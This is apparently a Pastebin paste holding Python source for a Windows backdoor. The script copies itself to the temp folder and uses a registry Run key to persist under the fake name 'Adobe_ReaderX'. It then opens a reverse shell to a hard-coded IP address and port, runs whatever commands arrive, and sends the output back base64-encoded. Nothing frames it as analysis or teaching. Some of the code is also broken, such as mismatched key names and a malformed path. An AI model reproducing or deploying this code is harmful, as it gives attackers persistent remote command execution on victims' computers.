Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket, subprocess, base64, sys, os
- from _winreg import *
- # Queries Windows registry for the autorun key value
- # Stores the key values in runkey array
- def autorun(tempdir, fileName, run):
- #copy executable to %temp%
- os.system('copy %s %s'%(fileName, run))
- #Check if auto run key exists
- key = OpenKey(HKEY_LOCAL_MACHINE, run)
- runkey = []
- try:
- i = 0
- while True:
- subkey = EnumValue(key, i)
- runkey.append(subkey[0])
- i += 1
- except WindowsError:
- pass
- #set auto run key
- if 'Adobe ReaderX' not in runkey:
- try:
- key = OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
- SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r'%TEMP\mw.py%')
- except WindowsError:
- pass
- #reverse shell
- def shell():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect(('192.168.56.1', int(442)))
- s.send('[*] Connection Established!')
- while 1:
- data = s.recv(1024)
- proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.pywintypes)
- stdout_value = proc.stdout.read() + proc.stderr.read()
- encoded = base64.b64encode(stdout_value)
- s.send(encoded)
- s.close()
- def main():
- tempdir = '%TEMP%'
- fileName = sys.argv[0]
- run = 'Software\Microsoft\Windows\CurrentVersion\Run'
- autorun(tempdir, fileName, run)
- shell()
- if __name__ == '__main__':
- main()
Add Comment
Please, Sign In to add comment
